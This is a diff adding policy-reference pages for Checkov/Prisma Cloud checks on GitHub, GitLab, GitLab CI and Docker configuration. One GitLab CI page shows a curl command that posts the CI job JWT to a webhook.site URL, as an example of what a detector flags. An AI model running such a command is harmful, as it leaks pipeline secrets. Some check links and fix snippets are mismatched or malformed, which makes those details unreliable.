https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_conversation_resolution.py[CKV_GITHUB_16] +|LOW + + +|xref:ensure-github-branch-protection-requires-push-restrictions.adoc[GitHub branch protection does not require push restrictions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_push_restrictions.py[CKV_GITHUB_17] +|LOW + + +|xref:ensure-github-branch-protection-requires-status-checks.adoc[GitHub branch protection does not require status checks] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_status_checks_pr.py[CKV_GITHUB_14] +|LOW + + +|xref:ensure-github-branch-protection-restricts-who-can-dismiss-pr-reviews-cis-115.adoc[GitHub branch protection does not restrict who can dismiss a PR] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/restrict_pr_review_dismissal.py[CKV_GITHUB_12] +|LOW + + +|xref:ensure-github-branch-protection-rules-does-not-allow-deletions.adoc[GitHub branch protection rules allow branch deletions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_branch_deletions.py[CKV_GITHUB_18] +|LOW + + +|xref:ensure-github-branch-protection-rules-requires-linear-history.adoc[GitHub branch protection rules do not require linear history] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_linear_history.py[CKV_GITHUB_8] +|LOW + + +|xref:ensure-github-branch-protection-rules-requires-signed-commits.adoc[GitHub branch protection rules do not require signed commits] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] +|MEDIUM + + +|xref:ensure-github-organization-and-repository-webhooks-are-using-https.adoc[GitHub repository webhooks do not use HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_repos.py[CKV_GITHUB_7] +|MEDIUM + + 
+|xref:ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc[GitHub organization security settings do not have IP allow list enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/ipallowlist.py[CKV_GITHUB_3] +|LOW + + +|xref:ensure-github-organization-security-settings-require-2fa.adoc[GitHub organization security settings do not include 2FA capability] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/2fa.py[CKV_GITHUB_1] +|HIGH + + +|xref:ensure-github-organization-security-settings-require-sso.adoc[GitHub organization security settings do not include SSO] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/sso.py[CKV_GITHUB_2] +|HIGH + + +|xref:ensure-github-organization-webhooks-are-using-https.adoc[GitHub organization webhooks do not use HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/webhooks_https_orgs.py[CKV_GITHUB_6] +|MEDIUM + + +|xref:ensure-github-repository-has-vulnerability-alerts-enabled.adoc[GitHub Repository doesn't have vulnerability alerts enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py[CKV_GIT_3] +|LOW + +|xref:merge-requests-should-require-at-least-2-approvals.adoc[GitHub merge requests should require at least 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/merge-requests-should-require-at-least-2-approvals.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/merge-requests-should-require-at-least-2-approvals.adoc new file mode 100644 index 000000000..323b2b023 --- /dev/null +++ 
b/code-security/policy-reference/build-integrity-policies/github-policies/merge-requests-should-require-at-least-2-approvals.adoc @@ -0,0 +1,55 @@ +== GitHub merge requests should require at least 2 approvals + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 362c7490-7e2d-453b-b1f0-288c1eb059c2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/disallow_force_pushes.py[CKV_GITHUB_5] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitHub, repository administrators can require that all pull requests receive a specific number of approving reviews before someone merges the pull request into a protected branch. +It is also possible to require approving reviews from people with write permissions in the repository or from a designated code owner. +If a collaborator attempts to merge a pull request with pending or rejected reviews into the protected branch, the collaborator will receive an error message. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_branch_protection, github_branch_protection_v3 +* *Attribute:* required_approving_review_count + +[source,hcl] +---- +resource "github_branch_protection_v3" "example" { + +... +required_pull_request_reviews { + +... + required_approving_review_count = 2
+} +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/avoid-creating-rules-that-generate-double-pipelines.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/avoid-creating-rules-that-generate-double-pipelines.adoc new file mode 100644 index 000000000..4852407ae --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/avoid-creating-rules-that-generate-double-pipelines.adoc @@ -0,0 +1,50 @@ +== Rules used could create a double pipeline + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6f64c307-bf13-44ff-ab2c-5f66e36ec7ef + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py[CKV_GITLABCI_2] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GitLabCI + +|=== + + + +=== Description + + +The use of multiple trigger rules in a CI configuration file can lead to duplicate pipelines running. +For example, if there is a trigger for every push and a trigger for merge request events, both triggers could be true and thus create two pipelines. + + +*Example Fix* + +Try to keep the number of trigger sources down to one. + + +[source,yaml] +---- +planOnlySubset: + script: echo "This job creates double pipelines!" 
+ rules: + - changes: + - $DOCKERFILES_DIR/* + - if: $CI_PIPELINE_SOURCE == "push" +- - if: $CI_PIPELINE_SOURCE == "merge_request_event" +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/gitlab-ci-policies.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/gitlab-ci-policies.adoc new file mode 100644 index 000000000..6e9167407 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/gitlab-ci-policies.adoc @@ -0,0 +1,19 @@ +== Gitlab CI Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:avoid-creating-rules-that-generate-double-pipelines.adoc[Rules used could create a double pipeline] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/AvoidDoublePipelines.py[CKV_GITLABCI_2] +|LOW + + +|xref:suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc[Suspicious use of curl in a GitLab CI environment] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py[CKV_GITLABCI_1] +|LOW + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc new file mode 100644 index 000000000..17b2bd982 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-ci-policies/suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc @@ -0,0 +1,44 @@ +== Suspicious use of curl in a GitLab CI environment + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8e7ade8f-68c7-45b6-95f1-d319b59b9a43 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py[CKV_GITLABCI_1] + 
+|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GitLabCI + +|=== + + + +=== Description + + +Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. +Investigate if the use of curl is appropriate and secure. + + +*Example Fix* + +Block and remove code that attempts to exfiltrate secrets. + + +[source,yaml] +---- +deploy: +- script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826' +---- diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-all-gitlab-groups-require-two-factor-authentication.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-all-gitlab-groups-require-two-factor-authentication.adoc new file mode 100644 index 000000000..5fe0e4654 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-all-gitlab-groups-require-two-factor-authentication.adoc @@ -0,0 +1,55 @@ +== Gitlab organization has groups with no two factor authentication configured +// Gitlab organization has groups that do not require two factor authentication (2FA) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ab197a5f-2a7e-4921-bdb9-202a27c8dc52 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/two_factor_authentication.py[CKV_GITLAB_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitLab, 2FA provides an additional level of security to user accounts. +When enabled, users are prompted for a code generated by an application in addition to supplying their username and password to sign in. + +=== Fix - Buildtime + + +*GitLab Enable 2FA for all users:* + + + +. On the top bar, select *Menu > Admin*. + +. On the left sidebar, select *Settings > General* (/admin/application_settings/general). + +. 
Expand the *Sign-in restrictions* section, where you can configure the two-factor authentication settings. + + +Enforce 2FA only for certain groups: + +. Go to the group's *Settings > General* page. + +. Expand the *Permissions and group features* section. + +. Select the *Require all users in this group to set up two-factor authentication* option. diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc new file mode 100644 index 000000000..dd3675603 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc @@ -0,0 +1,60 @@ +== Gitlab branch protection rules allow force pushes + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e633620-4449-47f6-8b20-42f125002d68 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/merge_requests_approvals.py[CKV_GITLAB_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In GitLab, permissions are fundamentally defined around the idea of having read or write permission to the repository and branches. +To impose further restrictions on certain branches, they can be protected. +When you perform more complex operations, for example, squash commits, reset or rebase your branch, you must force an update to the remote branch. +These operations imply rewriting the commit history of the branch. +Forcing an update is not recommended when you're working on shared branches. +You can enable force push on a protected branch, but this is ill-advised.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* gitlab_branch_protection +* *Attribute:* allow_force_push + + +[source,go] +---- +{ + "resource "gitlab_branch_protection" "BranchProtect" { +... +- allow_force_push = true ++ allow_force_push = false +... +}", + +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed.adoc new file mode 100644 index 000000000..8fa795778 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-commits-are-signed.adoc @@ -0,0 +1,59 @@ +== Gitlab project commits are not signed +// Gitlab project commits not signed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d2106a3f-81c8-4ee9-919b-b519dcedc59d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py[CKV_GLB_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In GitLab, administrators can turn on the capability to require signed commits for a project. +When you enable required commit signing on a branch, contributors and bots can only push commits that have been signed and verified to the branch. +If a collaborator pushes an unsigned commit to a branch that requires commit signatures, the collaborator will need to rebase the commit to include a verified signature, then force push the rewritten commit to the branch. + +=== Fix - Buildtime + + +*Terraform* + + +* Resource: gitlab_project +* Attribute: reject_unsigned_commits + + +[source,go] +---- +{ + "resource "gitlab_project" "example-two" { +... + push_rules { + ...
++ reject_unsigned_commits = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled.adoc new file mode 100644 index 000000000..981742e92 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/ensure-gitlab-prevent-secrets-is-enabled.adoc @@ -0,0 +1,57 @@ +== Gitlab project does not prevent secrets +// Gitlab project does not prevent pushing secrets in merge requests + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 67e38511-5836-4eaa-8925-53b9e58cc567 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py[CKV_GLB_3] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In GitLab, administrators can turn on the capability to identify and block secrets in merge requests (MR). + +=== Fix - Buildtime + + +*Terraform* + + +* Resource: gitlab_project +* Attribute: prevent_secrets + + +[source,go] +---- +{ + "resource "gitlab_project" "example-two" { +... + push_rules { + ... 
++ prevent_secrets = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/gitlab-policies.adoc b/code-security/policy-reference/build-integrity-policies/gitlab-policies/gitlab-policies.adoc new file mode 100644 index 000000000..7f42c203c --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/gitlab-policies.adoc @@ -0,0 +1,34 @@ +== Gitlab Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-all-gitlab-groups-require-two-factor-authentication.adoc[Gitlab organization has groups with no two factor authentication configured] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/two_factor_authentication.py[CKV_GITLAB_2] +|HIGH + + +|xref:ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc[Gitlab branch protection rules allows force pushes] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/gitlab/checks/merge_requests_approvals.py[CKV_GITLAB_1] +|MEDIUM + + +|xref:ensure-gitlab-commits-are-signed.adoc[Gitlab project commits are not signed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py[CKV_GLB_4] +|LOW + + +|xref:ensure-gitlab-prevent-secrets-is-enabled.adoc[Gitlab project does not prevent secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py[CKV_GLB_3] +|MEDIUM + + +|xref:merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc[Gitlab project merge has less than 2 approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py[CKV_GLB_1] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc 
b/code-security/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc
new file mode 100644
index 000000000..9d3510cd8
--- /dev/null
+++ b/code-security/policy-reference/build-integrity-policies/gitlab-policies/merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc
@@ -0,0 +1,57 @@
+== Gitlab project merge has less than 2 approvals
+// Gitlab project merge request requires less than 2 approvals
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| befd7267-1709-4aa3-8f73-c7311610da34
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py[CKV_GLB_1]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+In GitLab, administrators can require that all merge requests receive a specific number of approving reviews before someone merges the merge request into a protected branch.
+It is also possible to require approving reviews from people with write permissions in the repository or from a designated code owner.
+If a collaborator attempts to merge a merge request with pending or rejected reviews into the protected branch, the collaborator will receive an error message.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* Resource: gitlab_project
+* Attribute: approvals_before_merge
+
+
+[source,go]
+----
+{
+ "resource "gitlab_project" "example" {
+...
++ approvals_before_merge = 2
+...
+}", + +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policies.adoc b/code-security/policy-reference/docker-policies/docker-policies.adoc new file mode 100644 index 000000000..7f0e4d76e --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policies.adoc @@ -0,0 +1,3 @@ +== Docker Policies + + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/docker-policy-index.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/docker-policy-index.adoc new file mode 100644 index 000000000..01aa2ed74 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/docker-policy-index.adoc @@ -0,0 +1,62 @@ +== Docker Policy Index + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-docker-apt-is-not-used.adoc[Docker APT is used] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RunUsingAPT.py[CKV_DOCKER_9] +|LOW + + +|xref:ensure-docker-workdir-values-are-absolute-paths.adoc[Docker WORKDIR values are not absolute paths] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/WorkdirIsAbsolute.py[CKV_DOCKER_10] +|LOW + + +|xref:ensure-port-22-is-not-exposed.adoc[Port 22 is exposed] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ExposePort22.py[CKV_DOCKER_1] +|LOW + + +|xref:ensure-that-a-user-for-the-container-has-been-created.adoc[A user for the container has not been created] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UserExists.py[CKV_DOCKER_3] +|LOW + + +|xref:ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc[Copy is not used instead of Add in Dockerfiles] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AddExists.py[CKV_DOCKER_4] +|LOW + + +|xref:ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc[Healthcheck instructions have 
not been added to container images] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/HealthcheckExists.py[CKV_DOCKER_2] +|LOW + + +|xref:ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc[LABEL maintainer is used instead of MAINTAINER (deprecated)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/MaintainerExists.py[CKV_DOCKER_6] +|LOW + + +|xref:ensure-the-base-image-uses-a-non-latest-version-tag.adoc[Base image uses a latest version tag] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ReferenceLatestTag.py[CKV_DOCKER_7] +|LOW + + +|xref:ensure-the-last-user-is-not-root.adoc[Last USER is root] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RootUser.py[CKV_DOCKER_8] +|LOW + + +|xref:ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc[Update instructions are used alone in a Dockerfile] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UpdateNotAlone.py[CKV_DOCKER_5] +|LOW + +|xref:ensure-docker-from-alias-is-unique-for-multistage-builds.adoc[Docker From alias is not unique for multistage builds] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AliasIsUnique.py[CKV_DOCKER_11] +|LOW + +|=== + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used.adoc new file mode 100644 index 000000000..dee26335b --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used.adoc @@ -0,0 +1,52 @@ +== Docker APT is used + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e2c80d46-7f1f-4ef8-af47-0a60a23a8624 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/RunUsingAPT.py[CKV_DOCKER_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +It is generally a best practice to avoid using APT (Advanced Package Tool) when working with Docker containers. +This is because APT is designed to work with traditional server-based environments, and may not be well-suited for use with containers. +Using APT with Docker containers can create potential security risks, as it may allow packages to be installed that are not designed to work with containers. +This can lead to compatibility issues and potentially compromise the security of your containers. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM busybox:1.0 +RUN apt-get install curl +HEALTHCHECK CMD curl --fail http://localhost:3000 || exit 1", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds.adoc new file mode 100644 index 000000000..e571a9a44 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds.adoc @@ -0,0 +1,50 @@ +== Docker From alias is not unique for multistage builds + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eb4a901e-a5cc-4490-915a-8b9287425572 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AliasIsUnique.py[CKV_DOCKER_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + +Using unique FROM aliases in your Docker multistage builds can help improve the security and reliability of your builds. 
+The FROM alias is used to specify the base image for a build stage, and using a unique alias for each stage can help prevent confusion and ensure that the correct image is being used. + +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM debian:jesse1 as build +RUN stuff + +FROM debian:jesse1 as another-alias +RUN more_stuff", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths.adoc new file mode 100644 index 000000000..17da9f3bf --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths.adoc @@ -0,0 +1,67 @@ +== Docker WORKDIR values are not absolute paths + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3b5a51c0-9b3d-4cc2-be84-18e6ac4aba1b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/WorkdirIsAbsolute.py[CKV_DOCKER_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +Using absolute paths for the WORKDIR values in your Dockerfiles can help improve the security and reliability of your builds. +The WORKDIR value specifies the working directory for the build stage, and using an absolute path ensures that the correct directory is being used. +By using absolute paths for WORKDIR, you can help prevent potential issues such as using the wrong directory for a stage, which can lead to compatibility problems and potentially compromise the security of your containers. +It can also help ensure that your builds are consistent and reliable, as you can easily identify which directory is being used for each stage. 
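The WORKDIR guidance above can be sketched as a minimal Dockerfile (the base image, paths, and file names here are illustrative assumptions, not from the policy source); every `WORKDIR` value is an absolute path, so the check passes:

```dockerfile
# Hypothetical compliant example: every WORKDIR value is an absolute path
FROM python:3.11-slim

WORKDIR /usr/src/app            # absolute path
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY app.py .
CMD ["python", "app.py"]
```

A relative value such as `WORKDIR app` would fail the check, because the resulting directory then depends on whatever `WORKDIR` happened to come before it.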
+ +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM alpine:3.5 +RUN apk add --update py2-pip +RUN pip install --upgrade pip +WORKDIR /path/to/workdir +WORKDIR / +WORKDIR c:\\\\windows +WORKDIR "/path/to/workdir" +WORKDIR "c:\\\\windows" +ENV DIRPATH=/path +ENV GLASSFISH_ARCHIVE glassfish5 +WORKDIR $DIRPATH/$DIRNAME +WORKDIR ${GLASSFISH_HOME}/bin +COPY requirements.txt /usr/src/app/ +RUN pip install --no-cache-dir -r /usr/src/app/requirements.txt +COPY app.py /usr/src/app/ +COPY templates/index.html /usr/src/app/templates/ +EXPOSE 5000 +CMD ["python", "/usr/src/app/app.py"]", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed.adoc new file mode 100644 index 000000000..dde686465 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed.adoc @@ -0,0 +1,51 @@ +== Port 22 is exposed + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8e0be113-366f-461c-9fb7-4d646ae9a509 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/ExposePort22.py[CKV_DOCKER_1] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +By exposing port 22, you may allow a bad actor to brute force their way into the system and potentially get access to the entire network. +As a best practice, restrict SSH solely to known static IP addresses. +Limit the access list to include known hosts, services, or specific employees only. 
+ +=== Fix - Buildtime + + +*Docker* + + + + +[source,dockerfile] +---- +{ + "FROM busybox + +EXPOSE 8080", +} +---- + diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created.adoc new file mode 100644 index 000000000..5f39ba023 --- /dev/null +++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created.adoc @@ -0,0 +1,52 @@ +== A user for the container has not been created + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 54c9568e-e0c1-4686-828d-b60dc8e456f8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/UserExists.py[CKV_DOCKER_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Docker + +|=== + + + +=== Description + + +Containers should run as a non-root user. +It is good practice to run the container as a non-root user, where possible. +This can be done either via the `USER` directive in the `Dockerfile` or through `gosu` or similar where used as part of the `CMD` or `ENTRYPOINT` directives. 
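As a sketch of the `USER` approach mentioned above (the base image and user name are illustrative assumptions), a Dockerfile can create a dedicated account and switch to it so that the container does not run as root:

```dockerfile
# Hypothetical sketch: create an unprivileged user and switch to it
FROM debian:bookworm-slim
RUN useradd --create-home --shell /usr/sbin/nologin appuser
USER appuser
CMD ["sleep", "infinity"]
```

The `gosu` variant works similarly, except that the privilege drop happens inside the `ENTRYPOINT` script at container start rather than at build time.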
+
+=== Fix - Buildtime
+
+
+*Docker*
+
+
+
+
+[source,dockerfile]
+----
+{
+ "FROM base
+
+LABEL foo="bar baz"
+USER me",
+}
+----
+
diff --git a/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc
new file mode 100644
index 000000000..2879225f8
--- /dev/null
+++ b/code-security/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc
@@ -0,0 +1,47 @@
+== Copy is not used instead of Add in Dockerfiles
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2985c9ff-18f7-42bb-9883-a7c3ae1f9b01
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/dockerfile/checks/AddExists.py[CKV_DOCKER_4]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Docker
+
+|===
+
+
+
+=== Description
+
+
+The *Copy* instruction simply copies files from the local host machine to the container file system.
+The *Add* instruction could potentially retrieve files from remote URLs and perform operations such as unpacking them.
+The *Add* instruction, therefore, introduces security risks.
+For example, malicious files may be directly accessed from URLs without scanning, or there may be vulnerabilities associated with decompressing them.
+We recommend you use the *Copy* instruction instead of the *Add* instruction in the Dockerfile.
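To illustrate the recommendation above (the image and file names are hypothetical), copy local files with *Copy*, and fetch any remote content with an explicit download step whose output can be verified:

```dockerfile
# Hypothetical sketch: COPY for local files instead of ADD
FROM alpine:3.18
COPY config.txt /app/config.txt
# For remote archives, download and unpack explicitly so the content can be
# checksummed and scanned, rather than relying on ADD's implicit fetch-and-unpack.
```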
